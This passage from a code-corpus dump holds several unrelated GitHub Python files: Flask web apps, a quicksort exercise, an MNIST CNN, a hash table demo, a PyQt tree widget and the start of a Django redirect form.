sheetName = \"Sheet1\"\n resultUpdate = update(insertId,filePath, sheetName, start, end, isUseNewUser, isquchong)\n\n companyListNotInDB = resultUpdate[\"companyListNotInDB\"]\n resultSave = saveCompany(companyListNotInDB, savePath, realfilename)\n if resultSave[\"flag\"]:\n quchongFileName = resultSave[\"path\"]\n now_time = datetime.datetime.now().strftime('%Y-%m-%d %H-%M-%S')\n # 保存成功了,修改文件\n fileInformation = FileInfo.query.filter(FileInfo.id == insertId).first()\n fileInformation.status = 1 # 修改为了1\n fileInformation.quchongFile = quchongFileName\n fileInformation.updatetime = now_time\n\n db.session.commit()\n\n\n@company.route('/upload', methods=['GET', 'POST'])\ndef upload():\n # print(\"在这里执行了\")\n file = request.files.get('fileName') # 获取文件\n\n realfilename = file.filename # 获取文件名\n filename = change_filename(realfilename)\n # print(\"fileName:{}\".format(filename))\n savePath = \"upload\"\n file.save(os.path.join(savePath, filename)) # 保存文件,保存到数据库中\n now_time = datetime.datetime.now().strftime('%Y-%m-%d %H-%M-%S')\n fileInformation = FileInfo(1, realfilename, filename, \"\", 0,0,0,now_time, now_time)\n db.session.add(fileInformation)\n db.session.flush()\n # 输出新插入数据的主键\n insertId = fileInformation.id\n db.session.commit()\n\n\n # start = 2\n # end = -1\n # filePath = os.path.join(savePath, filename)\n # # print(filePath)\n # sheetName = \"\"\n # if sheetName == \"\":\n # sheetName = \"Sheet1\"\n # isUseNewUser = 1\n # isquchong = 1\n # resultUpdate = update(filePath, sheetName, start, end, isUseNewUser, isquchong)\n #\n # companyListNotInDB = resultUpdate[\"companyListNotInDB\"]\n # resultSave = saveCompany(companyListNotInDB, savePath, realfilename)\n #\n # quchongFileName = resultSave[\"path\"]\n # now_time = datetime.datetime.now().strftime('%Y-%m-%d %H-%M-%S')\n # #保存成功了,修改文件\n # fileInformation = FileInfo.query.filter(FileInfo.id==insertId).first()\n # fileInformation.status=1 #修改为了1\n # fileInformation.quchongFile=quchongFileName\n # fileInformation.updatetime = now_time\n #\n # db.session.commit()\n start = 2\n end = -1\n savePath = \"upload\"\n sheetName = \"\"\n isUseNewUser = 1\n isquchong = 1\n # reUpdateCompany(insertId, start, end, savePath, filename, sheetName, isUseNewUser, isquchong, realfilename)\n _thread.start_new_thread(reUpdateCompany,(insertId, start, end, savePath, filename, sheetName, isUseNewUser, isquchong, realfilename))\n\n return redirect('/p/uploadhtml')\n # return render_template('upload/upload.html')\n # return jsonify({\"id\":1})\n\n\n@company.route('/exporthtml', methods=['GET', 'POST'])\ndef exportHtml():\n return render_template('export/export.html')\n\n\n@company.route('/export', methods=['GET', 'POST'])\ndef exportCompany():\n target_path = \"generateForDownload\"\n # return send_from_directory(target_path, \"2个完整-----测试.xlsx\", as_attachment=True)\n\n companyName = request.form.get('companyName')\n storeName = request.form.get('storeName')\n belongTo = request.form.get('belongTo')\n bianhao = request.form.get('bianhao')\n shengfen = request.form.get('shengfen')\n city = request.form.get('city')\n countNumber = request.form.get('countNumber', type=int)\n canbaorenshu = request.form.get('canbaorenshu')\n isHaveCang = request.form.get('isHaveCang', type=int)\n startNumber = request.form.get('startNumber', type=int)\n endNumber = request.form.get('endNumber', type=int)\n yingxiaocount = request.form.get('yingxiaocount')\n startTime = request.form.get('startTime')\n endTime = request.form.get('endTime')\n isFromFileNumber = request.form.get('isFromFileNumber', type=int)\n\n userId = \"\"\n if belongTo != None and belongTo != \"\":\n userInfo = UserInfo.query.filter(UserInfo.realname.like(\"%\" + belongTo + \"%\")).first()\n userId = userInfo.id\n\n resultExport = export(companyName, storeName, userId, bianhao, shengfen, city, \\\n countNumber, canbaorenshu, isHaveCang, startNumber, \\\n endNumber, yingxiaocount, startTime, endTime, isFromFileNumber, \\\n target_path) # 返回结果{\"flag\": True, \"tips\": \"没有从数据库中获取数据,可能行号过大\",\"path\":\"\"}\n\n if (resultExport[\"flag\"]):\n return send_from_directory(target_path, resultExport[\"path\"], as_attachment=True)\n else:\n return jsonify(resultExport)\n # return jsonify(result)\n # target_path = \"\"\n # return send_from_directory(target_path, \"2个完整-----测试.xlsx\", as_attachment=True)\n\n\n@company.route('/update', methods=['GET', 'POST'])\ndef updateCompany():\n start = request.args.get(\"s\", default=-1)\n # print(\"==================start==={}\".format(start))\n end = request.args.get(\"e\", default=-1)\n # print(\"==================end==={}\".format(end))\n start = int(start)\n end = int(end)\n filePath = request.args.get(\"f\", default=\"\")\n # print(\"==================filePath==={}\".format(filePath))\n if (filePath == \"\"):\n return {\"flag\": False, \"tips\": \"缺少文件名称选项\"}\n elif (filePath.find(\".\") == -1):\n filePath = filePath + \".xlsx\"\n sheetName = request.args.get(\"sheet\", default=\"\")\n if sheetName == \"\":\n sheetName = \"Sheet1\"\n isUseNewUser = 1\n result = update(filePath, sheetName, start, end, isUseNewUser) # 返回结果{\"flag\": True, \"tips\": \"更新数据成功\",\"count\":\"\"}\n\n return jsonify(result)\n # return jsonify(result)\n\n\n@company.route('/testById', methods=['GET', 'POST'])\ndef testById():\n idargs = request.args.get(\"id\")\n idn = int(idargs)\n print(type(idargs))\n print(idn)\n cif = CompanyInfo.query.filter_by(id=idn).first()\n cis = CompanyInfoScheme(only=(\"companyName\", \"user.id\")) # only=(\"id\",) 一个元素必须带逗号,因为接收的元素只能是元组,不带逗号就是一个字符串\n # exclude ,也可以排除哪些字段显示\n result = cis.dump(cif)\n return jsonify(result)\n\n\n# http://127.0.0.1:8088/p/testById?id=1004\n\n@company.route('/deleteCompany', methods=['GET', 'POST'])\ndef deleteCompany():\n a = request.get_data() # 得到JavaScript发送的字符串流\n\n s1 = str(a, encoding='utf-8') # 解码为string\n\n dict1 = json.loads(s1) # 将string变成dict\n idn = int(dict1['id'])\n # print(type(idn))\n # print(idn)\n CompanyInfo.query.filter_by(id=idn).delete()\n db.session.commit()\n return jsonify({\"flag\": 1})\n\n\n@company.route('/showAll', methods=['GET', 'POST'])\ndef showAll():\n # dict = {}\n companyInfo = CompanyInfo.query.all()\n cis = CompanyInfoScheme(many=True)\n result = cis.dump(companyInfo)\n # print(result)\n # for i in companyInfo:\n # print(i.companyName)\n # dict[i.id] = json.dumps(obj=i.__dict__,ensure_ascii=False)\n return jsonify(result)","repo_name":"xiran2018/tfs","sub_path":"erp/company/company.py","file_name":"company.py","file_ext":"py","file_size_in_byte":16535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"35957437009","text":"# Quicksort algorithm\n# Takes in a list and a pivot index and returns a partitioned list\ncomparisons = 0\n\ndef read_file(filename):\n with open(filename) as text_file:\n numbers = text_file.read().splitlines()\n num_array = []\n for number in numbers:\n number = int(number)\n num_array.append(number)\n text_file.close()\n return num_array\n\ndef quicksort(a, pivot_idx, median=False):\n # Base case\n if len(a) <= 1:\n return a\n else:\n # This rather ugly code block basically implements the median\n # functionality\n # Compares three elements: first, middle and last, and gets the median\n # element of the three\n if median is True:\n if (len(a) % 2 == 0):\n idx = len(a) / 2\n else:\n idx = (len(a) // 2) + 1\n idx = int(idx)\n mid_ele = a[idx]\n first_ele = a[0]\n last_ele = a[-1]\n temp_a = [first_ele, mid_ele, last_ele]\n temp_b = [0, idx, -1]\n temp_c = sorted(set(temp_a))\n pivot_idx = temp_b[temp_a.index(temp_c[1])]\n\n p = partition(a, pivot_idx);\n # p[0] is the sorted array; we update its state \n # p[1] is the pivot index; the element that was used as the pivot in\n # the partition function\n a = p[0]\n pivot = p[1]\n # Make recursive quicksort calls on two arrays, making sure not to\n # include the pivot element\n a[:pivot] = quicksort(a[:pivot], pivot_idx, median)\n a[pivot+1:] = quicksort(a[pivot+1:], pivot_idx, median)\n return a\n\ndef partition(a, pivot_idx):\n # Move the pivot to the first element\n temp = a[0]\n a[0] = a[pivot_idx]\n a[pivot_idx] = temp\n pivot_element = a[0]\n\n # Initialise the partition point at 1, to the right of the pivot\n partition_point = 1\n global comparisons\n comparisons+=max(len(a)-1, 0)\n #print(a, comparisons, max(len(a)-1,0))\n # Iterate over the list, swapping if necessary\n #print(a, pivot_idx)\n for seen_array in range(1,len(a)):\n if (a[seen_array] < pivot_element):\n # Swap positions of seen_array and partition_point element\n temp = a[partition_point]\n a[partition_point] = a[seen_array]\n a[seen_array] = temp\n # Increment partition_point\n partition_point+=1;\n else:\n pass\n # Swap the pivot element into the correct position\n #print(a, partition_point)\n temp = a[partition_point-1]\n a[partition_point-1] = pivot_element\n a[0] = temp\n #print('sorted:', a, partition_point-1, pivot_element)\n return (a, partition_point-1)\n \nprint(quicksort(read_file('QuickSort.txt')[:10], 0))\nprint('comparisons: {}, expected {}'.format(comparisons, 25))\ncomparisons=0\nprint(quicksort(read_file('QuickSort.txt')[:10], -1))\nprint('comparisons: {}, expected {}'.format(comparisons, 29))\ncomparisons=0\nprint(quicksort(read_file('QuickSort.txt')[:10], 1, True))\nprint('comparisons: {}, expected {}'.format(comparisons, 21))\ncomparisons=0\nquicksort(read_file('QuickSort.txt')[:100], 0)\nprint('comparisons: {}, expected {}'.format(comparisons, 615))\ncomparisons=0\nquicksort(read_file('QuickSort.txt')[:100], -1)\nprint('comparisons: {}, expected {}'.format(comparisons, 587))\ncomparisons=0\nquicksort(read_file('QuickSort.txt')[:100], 1, True)\nprint('comparisons: {}, expected {}'.format(comparisons, 518))\ncomparisons=0\n\n'''\n> python3 quicksort.py \n [504, 609, 2148, 3153, 5469, 6324, 7017, 7628, 7742, 9058]\n comparisons: 25, expected 25\n [504, 609, 2148, 3153, 5469, 6324, 7017, 7628, 7742, 9058]\n comparisons: 31, expected 29\n [504, 609, 2148, 3153, 5469, 6324, 7017, 7628, 7742, 9058]\n comparisons: 24, expected 21\n comparisons: 620, expected 615\n comparisons: 573, expected 587\n comparisons: 540, expected 518\n'''\n","repo_name":"lieuzhenghong/algorithms-design-and-analysis","sub_path":"1/assignment3Quicksort/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"24294132375","text":"from tensorflow.keras.datasets import mnist\r\nimport numpy as np\r\nfrom tensorflow.keras.utils import to_categorical\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Conv2D, Dense, Flatten, MaxPooling2D\r\nfrom tensorflow.keras.utils import plot_model\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom tensorflow.keras.utils import load_img, img_to_array\r\nfrom tensorflow import expand_dims\r\n#from PIL import Image\r\n\r\n(X_train, Y_train), (X_test, Y_test) = mnist.load_data()\r\nprint(X_train.shape)\r\nprint(Y_train.shape)\r\nprint(X_test.shape)\r\nprint(Y_test.shape)\r\n#%matplotlib inline\r\nsns.set(font_scale = 2)\r\nindex = np.random.choice(np.arange(len(X_train)), 24, replace = False)\r\nfigure, axes = plt.subplots(nrows=4, ncols=6, figsize=(16,9))\r\nfor item in zip(axes.ravel(), X_train[index], Y_train[index]):\r\n axes, pic, target = item\r\n axes.imshow(pic, cmap=plt.cm.gray_r)\r\n axes.set_xticks([])\r\n axes.set_yticks([])\r\n axes.set_title(target)\r\n plt.tight_layout()\r\nX_train = X_train.reshape((60000, 28, 28, 1))\r\nprint(X_train.shape)\r\nX_test = X_test.reshape((10000, 28, 28, 1))\r\nprint(X_test.shape)\r\nX_train = X_train.astype('float32')/255\r\nX_test = X_test.astype('float32')/255\r\nY_train = to_categorical(Y_train)\r\nY_train.shape\r\nprint(Y_train[0])\r\nY_test = to_categorical(Y_test)\r\nprint(Y_test.shape)\r\ncnn = Sequential()\r\ncnn.add(Conv2D(filters=64, kernel_size=(3,3), activation='relu', input_shape=(28,28,1)))\r\ncnn.add(MaxPooling2D(pool_size=(2,2)))\r\ncnn.add(Conv2D(filters=128, kernel_size=(3,3), activation='relu'))\r\ncnn.add(MaxPooling2D(pool_size=(2,2)))\r\ncnn.add(Flatten())\r\ncnn.add(Dense(units=128, activation='relu'))\r\ncnn.add(Dense(units=10, activation='softmax'))\r\nprint(cnn.summary())\r\ncnn.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\r\ncnn.fit(X_train, Y_train, epochs=5, batch_size=64, validation_split=0.1)\r\nloss, accuracy = cnn.evaluate(X_test, Y_test)\r\nprint(loss, ' ', accuracy)\r\nprzypuszczenia = cnn.predict(X_test)\r\nprint(Y_test[0])\r\nfor indeks, przypuszczenie in enumerate(przypuszczenia[0]):\r\n print(f'{indeks}: { przypuszczenie:.10%}')\r\nobrazy = X_test.reshape((10000, 28, 28))\r\nchybione_prognozy = []\r\nfor i, (p, e) in enumerate(zip(przypuszczenia, Y_test)):\r\n prognozowany, spodziewany = np.argmax(p), np.argmax(e)\r\n if prognozowany != spodziewany:\r\n chybione_prognozy.append(\r\n (i, obrazy[i], prognozowany, spodziewany))\r\nprint(len(chybione_prognozy))\r\nfigure, axes = plt.subplots(nrows=4, ncols=6, figsize=(16,12))\r\nfor axes, element in zip(axes.ravel(), chybione_prognozy):\r\n indeks, obraz, prognozowany, spodziewany = element\r\n axes.imshow(obraz, cmap=plt.cm.gray_r)\r\n axes.set_xticks([])\r\n axes.set_yticks([])\r\n axes.set_title(\r\n f'index: {indeks}\\np: {prognozowany}; s:{spodziewany}')\r\nplt.tight_layout()\r\nplt.show()\r\n\r\nimages = ['zero', 'one', 'two', 'three', 'four',\r\n 'five', 'six', 'seven', 'eight', 'nine']\r\nfor img in images:\r\n img2 = load_img(img + '.bmp', target_size=(28, 28), color_mode=\"grayscale\", interpolation=\"bilinear\")\r\n input_arr = img_to_array(img2)\r\n input_arr = expand_dims(input_arr, 0)\r\n input_arr /= 255.\r\n input_arr = 1. - input_arr\r\n digit = cnn.predict(input_arr)\r\n plt.imshow(input_arr[0], cmap=plt.cm.gray_r)\r\n plt.show()\r\n print(img)\r\n for indeks, result in enumerate(digit[0]):\r\n print(f'{indeks}: {result:.10%}')\r\n","repo_name":"DamianBisewski/MLsimpleexamples","sub_path":"Digitrecognition.py","file_name":"Digitrecognition.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"16010210068","text":"import datetime\n\nbase_url = \"https://www.seismicportal.eu/fdsnws/event/1/query?limit=7000&start={}&end={}\"\n\nstart_date = datetime.datetime(1998, 7, 19)\nend_date = datetime.datetime(2023, 7, 19)\n\ncurrent_date = start_date\nlinks = []\n\ni=0\nwhile current_date <= end_date:\n start_time = current_date.strftime(\"%Y-%m-%dT%H:%M:%S.0\")\n end_time = (current_date + datetime.timedelta(days=1) - datetime.timedelta(seconds=1)).strftime(\"%Y-%m-%dT%H:%M:%S.0\")\n link = base_url.format(start_time, end_time)\n links.append(link)\n current_date += datetime.timedelta(days=1)\n i=i+1\n\nwith open(\"./logstash/seismic_portal_links.txt\", \"w\") as file:\n for link in links:\n file.write(link + \"\\n\")\n\n\n ","repo_name":"Daedalus9/QuakeMatch","sub_path":"logstash/urls_dates.py","file_name":"urls_dates.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"25297472732","text":"from flask import Flask, jsonify, render_template, request, url_for\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker \nimport os\nimport re\nfrom helpers import lookup\nimport json\n\n# creating flask object\napp = Flask(__name__)\n\n# configure sql_alchemy\nengine = create_engine(os.getenv('DATABASE_URL'))\ndb = scoped_session(sessionmaker(bind=engine))\n\n# for \ndef alchemyencoder(obj):\n \"\"\"JSON encoder function for SQLAlchemy special classes.\"\"\"\n if isinstance(obj, datetime.date):\n return obj.isoformat()\n elif isinstance(obj, decimal.Decimal):\n return float(obj)\n\n# to ensure the responses aren't cached (stored)\n@app.after_request\ndef after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n\n\n# route the default page\n@app.route('/')\ndef index():\n # to render map\n if not os.environ.get(\"API_KEY\"):\n raise RuntimeError(\"API_KEY not set\")\n return render_template(\"index.html\", key=os.environ.get(\"API_KEY\"))\n\n@app.route(\"/articles\")\ndef articles():\n \"\"\"Look up articles for geo\"\"\"\n query = request.args.get(\"geo\")\n\n # validate location\n if not query:\n raise RuntimeError(\"Location is not specified\")\n # to get parsed rss feeds\n articles = lookup(query)\n\n # get 5 articles\n if len(articles) > 5:\n #return jsonify(articles[:5])\n return json.dumps([dict(articles[r]) for r in range(5)],default=alchemyencoder)\n else:\n #return jsonify(articles)\n return json.dumps([dict(r) for r in articles],default=alchemyencoder)\n\n\n@app.route(\"/search\")\ndef search():\n \"\"\"Search for places that match query\"\"\"\n # Raise exception if no args is passed\n if not request.args.get('q'):\n raise RuntimeError(\"missing query\")\n # % is the SQL's wild card which here help\n q = request.args.get(\"q\") + \"%\"\n places = db.execute(\"SELECT * FROM places WHERE postal_code LIKE :q OR place_name LIKE :q\", {'q': q}).fetchall()\n if len(places) > 10:\n #return jsonify(places[:10])\n return json.dumps([dict(places[r]) for r in range(10)],default=alchemyencoder)\n else:\n #return jsonify(places)\n return json.dumps([dict(r) for r in places],default=alchemyencoder)\n\n\n@app.route(\"/update\")\ndef update():\n \"\"\"Find up to 10 places within view\"\"\"\n # Ensure parameters are present\n if not request.args.get(\"sw\"):\n raise RuntimeError(\"missing sw\")\n if not request.args.get(\"ne\"):\n raise RuntimeError(\"missing ne\")\n\n # Ensure parameters are in lat,lng format\n if not re.search(\"^-?\\d+(?:\\.\\d+)?,-?\\d+(?:\\.\\d+)?$\", request.args.get(\"sw\")):\n raise RuntimeError(\"invalid sw\")\n if not re.search(\"^-?\\d+(?:\\.\\d+)?,-?\\d+(?:\\.\\d+)?$\", request.args.get(\"ne\")):\n raise RuntimeError(\"invalid ne\")\n\n # Explode southwest corner into two variables\n sw_lat, sw_lng = map(float, request.args.get(\"sw\").split(\",\"))\n\n # Explode northeast corner into two variables\n ne_lat, ne_lng = map(float, request.args.get(\"ne\").split(\",\"))\n\n # Find 10 cities within view, pseudorandomly choosen if more within view\n if sw_lng <= ne_lng:\n\n # Doesn't cross the antimeridian\n rows = db.execute(\"\"\"SELECT * FROM places\n WHERE :sw_lat <= latitude AND latitude <= :ne_lat AND (:sw_lng <= longitude AND longitude <= :ne_lng)\n GROUP BY country_code, place_name, admin_code1\n ORDER BY RANDOM()\n LIMIT 10\"\"\",\n {'sw_lat': sw_lat, 'ne_lat': ne_lat, 'sw_lng': sw_lng, 'ne_lng': ne_lng}).fetchall()\n\n else:\n\n # Crosses the antimeridian\n rows = db.execute(\"\"\"SELECT * FROM places\n WHERE :sw_lat <= latitude AND latitude <= :ne_lat AND (:sw_lng <= longitude OR longitude <= :ne_lng)\n GROUP BY country_code, place_name, admin_code1\n ORDER BY RANDOM()\n LIMIT 10\"\"\",\n {'sw_lat': sw_lat, 'ne_lat': ne_lat, 'sw_lng': sw_lng, 'ne_lng': ne_lng}).fetchall()\n\n # Output places as JSON\n #return jsonify(rows)\n return json.dumps([dict(r) for r in rows],default=alchemyencoder)\n","repo_name":"GeVic/Mapit","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":4377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"70050890234","text":"#!/usr/bin/env python\nfrom peyotl import write_as_json\nimport codecs\nimport json\nimport time\nimport sys\n\n\ndef report_results(tag, duration, expected_fn, result):\n with codecs.open(expected_fn, 'rU', encoding='utf-8') as f:\n expected = json.load(f)\n succeeded = True\n if expected != result:\n obtained_fn = expected_fn + '-obtained.json'\n write_as_json(result, obtained_fn)\n succeeded = False\n return {'tag': tag,\n 'duration': duration,\n 'expected-output': succeeded,\n 'returned': True,\n 'status': 200\n }\n\n\ndef report_error(tag, duration, err):\n r = {'tag': tag,\n 'duration': duration,\n 'expected-output': False,\n 'returned': False,\n 'status': err.response.status_code,\n 'url': err.response.url,\n }\n if err.response.text:\n r['content'] = err.response.text\n return r\n\n\ndef _ot_call(tag, expected_fn, func, *valist, **kwargs):\n start_t = time.time()\n try:\n result = func(*valist, **kwargs)\n end_t = time.time()\n return report_results(tag, end_t - start_t, expected_fn, result)\n except HTTPError as x:\n end_t = time.time()\n return report_error(tag, end_t - start_t, x)\n\n\nif __name__ == '__main__':\n from peyotl.api import APIWrapper\n from requests import HTTPError\n import datetime\n\n timestamp = datetime.datetime.utcnow()\n\n otwrap = APIWrapper(phylesystem_api_kwargs={'get_from': 'api'})\n summary_list = []\n\n summary = _ot_call('treemachine/getSyntheticTree',\n 'curl-versions/getSyntheticTree.json',\n lambda: otwrap.treemachine.synthetic_tree,\n 'otol.draft.22',\n format='arguson',\n node_id=3534540,\n max_depth=3)\n summary_list.append(summary)\n\n summary = _ot_call('treemachine/getDraftTreeSubtreeForNodes',\n 'curl-versions/getDraftTreeSubtreeForNodes.json',\n otwrap.treemachine.get_synth_tree_pruned,\n ott_ids=[515698, 515712, 149491, 876340, 505091, 840022, 692350, 451182, 301424, 876348, 515698,\n 1045579, 267484, 128308, 380453, 678579, 883864, 863991, 3898562, 23821, 673540, 122251,\n 106729, 1084532, 541659]\n )\n summary_list.append(summary)\n\n summary = _ot_call('treemachine/getSynthesisSourceList',\n 'curl-versions/getSynthesisSourceList.json',\n lambda: otwrap.treemachine.synthetic_source_list,\n )\n summary_list.append(summary)\n\n summary = _ot_call('taxomachine/autocompleteBoxQuery',\n 'curl-versions/autocompleteBoxQuery.json',\n otwrap.taxomachine.autocomplete,\n 'Endoxyla',\n 'All life'\n )\n summary_list.append(summary)\n\n summary = _ot_call('phylesystem/study_list',\n 'curl-versions/study_list.json',\n lambda: otwrap.phylesystem_api.study_list,\n )\n summary_list.append(summary)\n\n summary = _ot_call('phylesystem/pg_719',\n 'curl-versions/pg_719.json',\n otwrap.phylesystem_api.get_study,\n 'pg_719')\n summary_list.append(summary)\n\n blob = {'time': timestamp.isoformat(),\n 'time_string': timestamp.strftime('%A %H:%M:%S.%f (UTC) %d %B, %Y'),\n 'summary': summary_list\n }\n out = codecs.getwriter('utf-8')(sys.stdout)\n write_as_json(blob, out, indent=1)\n","repo_name":"OpenTreeOfLife/peyotl","sub_path":"examples/ot-api/service-status-check.py","file_name":"service-status-check.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"95"} +{"seq_id":"963514894","text":"import os\nimport matplotlib.pyplot as plt\n\n\n# 查看图片数量\ndef read_flower_data(folder_name):\n folders = os.listdir(folder_name)\n flower_names = []\n flower_nums = []\n for folder in folders:\n folder_path = os.path.join(folder_name, folder)\n images = os.listdir(folder_path)\n images_num = len(images)\n print(\"{}:{}\".format(folder, images_num))\n flower_names.append(folder)\n flower_nums.append(images_num)\n\n return flower_names, flower_nums\n\n\n# 绘制柱状图\ndef show_bar(x, y):\n # 绘图\n plt.barh(range(5), y, align='center', color='steelblue', alpha=0.8)\n # 添加轴标签\n plt.xlabel('num')\n # 添加标题\n plt.title('Num of flowers')\n # 添加刻度标签\n plt.yticks(range(5), x)\n # 设置Y轴的刻度范围\n # plt.xlim([32, 47])\n # 为每个条形图添加数值标签\n for x, y in enumerate(y):\n plt.text(y + 0.1, x, '%s' % y, va='center')\n # 显示图形\n plt.show()\n\n\nif __name__ == '__main__':\n x, y = read_flower_data('../data/flower_photos')\n show_bar(x, y)","repo_name":"cmFighting/Flower_tf2.3","sub_path":"data_read.py","file_name":"data_read.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"95"} +{"seq_id":"72569345273","text":"#hash table with collisions\nhash_table = [\"\"] * 5\n\ndef hash_function(thing_to_be_hashed):\n #add up the ascii values of the string and mod length of table (takes care of overflow)\n print(sum([ord(char) for char in thing_to_be_hashed]))\n return sum([ord(char) for char in thing_to_be_hashed])%len(hash_table)\n\ndef insert(table,thing_to_be_hashed):\n hash_table[hash_function(thing_to_be_hashed)]=thing_to_be_hashed\n\ninsert(hash_table,\"Jon Snow\")\ninsert(hash_table,\"Andria\")\ninsert(hash_table,\"Adrian\")\nprint(hash_table)\n\n#hash table that uses chaining\n\nchained_hash_table= [[]for j in range(5)]\n\n#this time we add to a list at that index, so we don't overwrite\ndef chained_insert(table,thing_to_be_hashed):\n chained_hash_table[hash_function(thing_to_be_hashed)].append(thing_to_be_hashed)\n\nchained_insert(chained_hash_table,\"Adrian\")\nchained_insert(chained_hash_table,\"Andria\")\nchained_insert(chained_hash_table,\"Ardian\")\nprint(chained_hash_table)\n\n#this will tell you where to start looking, but still sucks\ndef get(table,thing_to_get):\n index = hash_function(thing_to_get)\n print(str(thing_to_get) + \" is located at index: \" +str(index))\n return index\nget(chained_hash_table,\"Adrian\")\nget(chained_hash_table,\"Andria\")\n\ndef get4real(table,thing_to_get):\n start = get(table,thing_to_get)\n i=0\n while table[start][i]!=thing_to_get:\n i+=1\n return (start,i)\nprint(get4real(chained_hash_table,\"Ardian\"))\n","repo_name":"YimRegister/YimmyTalks","sub_path":"hashtable.py","file_name":"hashtable.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"1290355274","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom ..assets import assets\nfrom .abstractions import Data\nimport os\nimport numpy as np\n\nclass ProjectTree(QtWidgets.QTreeWidget):\n\n opened_data = QtCore.pyqtSignal(Data)\n \n def __init__(self, *args):\n QtWidgets.QTreeWidget.__init__(self, args[0])\n args[2].addWidget(self, 0, 0, 6, 2)\n \n self.setObjectName(\"ProjectTreeWidget\")\n self.setHeaderLabel(\"Projects\")\n self.setStyleSheet( \"QTreeWidget{background: rgb(216,233,250);}\")\n self.startpath = args[1]\n self.search_projects()\n self.itemDoubleClicked.connect(self.open_item)\n\n def reset(self):\n iterator = QtWidgets.QTreeWidgetItemIterator(self, QtWidgets.QTreeWidgetItemIterator.All)\n while iterator.value():\n iterator.value().takeChildren()\n iterator +=1\n i = self.topLevelItemCount()\n while i > -1:\n self.takeTopLevelItem(i)\n i -= 1\n\n def open_item(self, item, col):\n \"\"\"\n Open an item in the tree\n :param item:\n :type item: QTreeWidgetItem\n \"\"\"\n path = self.get_abs_path(item)\n if self.is_project(path):\n if not item.isOpen():\n self.load_project(path, item)\n item.setOpen(True)\n elif os.path.isdir(path):\n if not item.isOpen():\n self.open_folder(path, item)\n item.setOpen(True)\n else:\n self.open_file(path)\n\n def open_file(self, path):\n \"\"\"\n Open a file with data, tagged or not\n :param path: Path to the file\n :type path: str:\n \"\"\"\n try:\n tagged = False\n tags = []\n with open(path, 'r') as f:\n tags = f.readline().split(' ')\n for tag in tags:\n try:\n complex(tag)\n except ValueError:\n #The string is not a number, so it must be a tag\n tagged = True\n break;\n\n #Remove end of line\n tags[-1] = tags[-1][:-1]\n \n skiprows = 0\n if tagged:\n skiprows = 1\n else:\n tags = []\n \n data = np.loadtxt(path, skiprows=skiprows)\n self.opened_data.emit(Data(data, tags))\n \n except Exception as err:\n raise ValueError(\"Could not read data from \" + path + \".\\n\", err)\n \n def open_folder(self, folder, tree):\n \"\"\"\n Opens a folder in the tree\n :param folder: Folder to open\n :type folder: str\n \"\"\"\n for element in os.listdir(folder):\n path_info = folder + \"/\" + element\n parent_itm = CustomTreeWidgetItem(tree, [element])\n if os.path.isdir(path_info):\n parent_itm.setIcon(0, QtGui.QIcon(':/images/folder.png'))\n self.open_folder(path_info, parent_itm)\n parent_itm.setExpanded(False)\n parent_itm.setOpen(True)\n else:\n parent_itm.setIcon(0, QtGui.QIcon(':/images/file.png'))\n \n \n def search_projects(self, startpath=None):\n \"\"\"\n Search for projects in the workspace\n and load them into the tree structure\n :param startpath: Set workspace to given path\n :type startpath: str\n :return: \n \"\"\"\n if startpath is not None:\n self.startpath = startpath\n for element in os.listdir(self.startpath):\n path_info = self.startpath + \"/\" + element\n if self.is_project(path_info):\n parent_itm = CustomTreeWidgetItem(self, [element])\n parent_itm.setIcon(0, QtGui.QIcon(':/images/proj.png'))\n \n \n def load_project(self, proj_path, tree):\n \"\"\"\n Load a single project into the tree\n :param tree: \n :return: \n \"\"\"\n # THIS MUST BE REIMPLEMENTED WHEN PROJECT DATA IS AVAILABLE\n self.open_folder(proj_path, tree)\n\n \n def is_project(self, path_info):\n # THIS MUST BE REIMPLEMENTED WHEN PROJECT DATA IS AVAILABLE\n # For the moment, just look for a .prj file\n return os.path.isdir(path_info) and len(list(filter(lambda x : '.prj' in x, os.listdir(path_info)))) == 1\n\n def get_abs_path(self, item):\n if item is None:\n return self.startpath\n else:\n return self.get_abs_path(item.parent()) + '/' + item.text(0)\n\n \nclass CustomTreeWidgetItem(QtWidgets.QTreeWidgetItem):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._isOpen = False\n \n def setOpen(self, isOpen):\n self._isOpen = isOpen\n\n def isOpen(self):\n return self._isOpen\n","repo_name":"Booligans/BMLF","sub_path":"src/main/python/ui/widgets/treewidget.py","file_name":"treewidget.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"26374115691","text":"from django import forms\nfrom django.core.signing import BadSignature, Signer\nfrom django.utils.translation import gettext_lazy as _\n\nfrom wagtail.admin.widgets import AdminPageChooser\nfrom wagtail.contrib.redirects.models import Redirect\nfrom wagtail.models import Site\n\n\nclass RedirectForm(forms.ModelForm):\n site = forms.ModelChoiceField(\n label=_(\"From site\"),\n 